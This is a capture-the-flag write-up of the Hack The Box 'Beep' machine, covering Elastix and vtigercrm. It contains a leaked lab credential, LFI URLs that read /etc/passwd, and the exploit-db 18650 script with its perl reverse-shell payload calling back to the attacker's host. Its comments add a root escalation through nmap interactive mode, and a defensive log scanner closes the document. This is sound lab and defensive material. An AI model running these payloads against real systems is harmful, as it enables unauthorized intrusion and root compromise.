
Hack The Box - Beep

[screenshot: 20210321190442.png]

Information Gathering

nmap -T4 -A 10.10.10.7

[screenshot: 20210321190949.png]

Port 80 serves an Elastix application:

[screenshot: 20210321190726.png]

Use searchsploit to look up known vulnerabilities:

[screenshot: 20210321191148.png]

Exploitation

Vulnerability 1

An LFI vulnerability was found; exploiting it exposes sensitive information:

[screenshot: 20210321191559.png]

This reveals a username and password: admin:jEhdIekWmdjE.

Logging in with these credentials grants access to the admin panel:

[screenshot: 20210321191816.png]

Trying the same credentials against SSH:

[screenshot: 20210321194651.png]

Because the password is reused across services, this directly yields a shell.

Vulnerability 2

An RCE vulnerability was found in the exploit database: https://www.exploit-db.com/exploits/18650

Modify the payload's rhost, lhost, lport and extension values:


```python
# Python 2 script (urllib.urlopen), as published in exploit-db 18650
import urllib
import ssl

rhost='10.10.10.7'
lhost='10.10.14.7'
lport=4444
extension='233'

ctx=ssl.create_default_context()
ctx.check_hostname=False
ctx.verify_mode=ssl.CERT_NONE

# Reverse shell payload
url='https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url, context=ctx)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 .
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/)
# Welcome to Interactive Mode -- press h enter for help
# nmap !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```

The SIP extension can be confirmed in the admin panel after logging in:

[screenshot: 20210321195811.png]

Vulnerability 3

Directory scanning found the vtigercrm directory; searching for known vulnerabilities shows that an LFI exists:

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=./././././././././etc/passwd%00

[screenshot: 20210321201652.png]

You can also include /etc/amportal.conf to obtain the password information.

In addition, Metasploit (MSF) also has modules for vtigercrm:

[screenshot: 20210321202356.png]

Module 1 failed; module 2 succeeded.

[screenshot: 20210321202510.png]
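A defensive complement, added here and not part of the original post or of the exploit-db script: a Python 3 scanner for web-server access logs that flags the request shapes behind vulnerabilities 2 and 3 (a null byte or `../` in a query parameter, and CRLF sequences smuggling an `Application: system` header into callme_page.php). The log lines are constructed samples and the function names are mine.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined-log format (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Mar/2021:19:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [21/Mar/2021:19:16:02 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../etc/passwd%00 HTTP/1.1" 200 1987 "-" "curl/7.68.0"
10.0.0.9 - - [21/Mar/2021:19:48:10 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20x HTTP/1.1" 200 12 "-" "Python-urllib/2.7"
"""

# Client IP, timestamp, method and request target of a combined-log line.
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')


def inspect_request(line):
    """Return finding labels for one access-log line (empty list if nothing suspicious)."""
    m = REQ_RE.match(line)
    if not m:
        return ["unparseable"]
    parts = urlsplit(m.group("target"))
    findings = []
    if "../" in parts.path:
        findings.append("traversal:path")
    # parse_qsl percent-decodes values, so %00 and %0D%0A become real control characters.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if "\x00" in value:
            findings.append(f"null-byte:{key}")    # truncates the suffix the PHP script appends
        if "../" in value or value.startswith("/etc/"):
            findings.append(f"traversal:{key}")
        if "\r" in value or "\n" in value:
            findings.append(f"crlf:{key}")         # header injection into the Asterisk call file
            if re.search(r"\bApplication:\s*system\b", value, re.I):
                findings.append(f"asterisk-system-app:{key}")
    return findings


def scan_log(text):
    """Return (client_ip, path, findings) for every suspicious line in the log text."""
    report = []
    for line in text.splitlines():
        findings = inspect_request(line)
        if findings:
            m = REQ_RE.match(line)
            ip = m.group("ip") if m else None
            path = urlsplit(m.group("target")).path if m else None
            report.append((ip, path, findings))
    return report


if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(ip, path, ", ".join(findings))
```

The same checks apply to a WAF rule or a SIEM parser; the decoded-value comparison matters because the raw log line only ever shows `%00` and `%0D%0A`.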
